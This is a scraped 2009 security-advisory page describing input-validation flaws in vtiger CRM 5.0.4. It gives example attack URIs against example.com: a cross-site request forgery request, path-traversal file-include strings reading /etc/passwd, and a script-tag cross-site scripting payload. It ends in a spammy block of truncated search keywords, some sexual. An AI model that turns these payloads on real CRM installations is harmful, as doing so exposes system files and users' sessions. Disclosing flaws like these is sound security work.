exploits , vulnerabilities , articles , vtiger CRM Multiple Input Validation Vulnerabilities

Title	vtiger CRM Multiple Input Validation Vulnerabilities
Published	2009-08-18-12:00AM
Updated	2009-08-21-08:23PM
Class	Input Validation Error
CVE
Remote	Yes
Local	No
Credit	Giovanni "evilaliv3" Pellerano, Antonio "s4tan" Parata, Francesco "ascii" Ongaro
Vulnerable	vtiger vtiger CRM 5.0.4
Not Vulnerable
Code	An attacker can use a browser to exploit these issues. To exploit the cross-site scripting and cross-site request-forgery vulnerabilities, the attacker must entice an unsuspecting victim into following a malicious URI.The following example URIs are available:For the cross-site request-forgery issue: http://www.example.com/vtigercrm/index.php?module=Rss&action=Save&rssurl=http://www.example2.comFor the local file-include issues: http://www.example.com/vtigercrm/graph.php?module=/../[..]/../etc/passwd%00 http://www.example.com/vtigercrm/index.php?module=Accounts&action=Import&parenttab=Support&step=/../[..]/../etc/passwd%00 http://www.example.com/vtigercrm/include/Ajax/CommonAjax.php?module=Email&file=bar http://www.example.com/vtigercrm/include/Ajax/CommonAjax.php?module=Email&file=barFor the cross-site scripting issue: http://www.example.com/vtigercrm/phprint.php?module=Activities&action=--%3E%3Cscript%3Ealert(%22example%22);%3C/script%3E%3C!--
TXT

Vulnerabilities - newest 10 RSS | More

2009-12-15 TYPO3 Watchdog (aba_watchdog) Unspecified Information Disclosure Vulnerability
2009-12-15 PostgreSQL Index Function Session State Modification Local Privilege Escalation Vulnerability
2009-12-15 PostgreSQL NULL Character CA SSL Certificate Validation Security Bypass Vulnerability
2009-12-15 IBM DB2 prior to 9.5 Fix Pack 5 Multiple Unspecified Security Vulnerabilities
2009-12-15 Sun Ray Server Software Desktop Session Handling Local Security Bypass Vulnerability
2009-12-15 Mozilla Firefox Sage Extension RSS Feeds Cross Domain Scripting Vulnerability
2009-12-15 Adobe Reader and Acrobat (CVE-2009-4324) Remote Code Execution Vulnerability
2009-12-14 Microsoft Protected Extensible Authentication Protocol Authentication Bypass Vulnerability
2009-12-14 Google Chrome DNS Pre-Fetching Proxy Cache Information Disclosure Vulnerability
2009-12-14 Oracle E-Business Suite Multiple Remote Vulnerabilities

SECURITY RSS FEEDS

Advertising

Copyright 2007, SecurityDot
Wed, 16 Dec 2009 07:51:34 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
www.xxx mo www.taobao sexdownlod 4.3.10 CRISTAL PR bitnet www.auraka /vuln/expl imegessex cgi mambo Remo home.5weix security i comments Tarapatric www.bjdabx exploit fo maxcpm.inf decom www.v2bb.c Vedioclip share PHP CGI 0. www.kmshen domain:www malayalam www.lexsen www.zbjiao saxy video www.fj123. syng www.guangt mambo Remo www.xnxx s 537780.b2b ms06-014 ssex Hotbeds sexdownlod Download g Vio Sex arsenal.41 sexcity.co sex parsi fastweb2 2008327.ma Sexe top ms06-014 Malika fuc www.jncyzc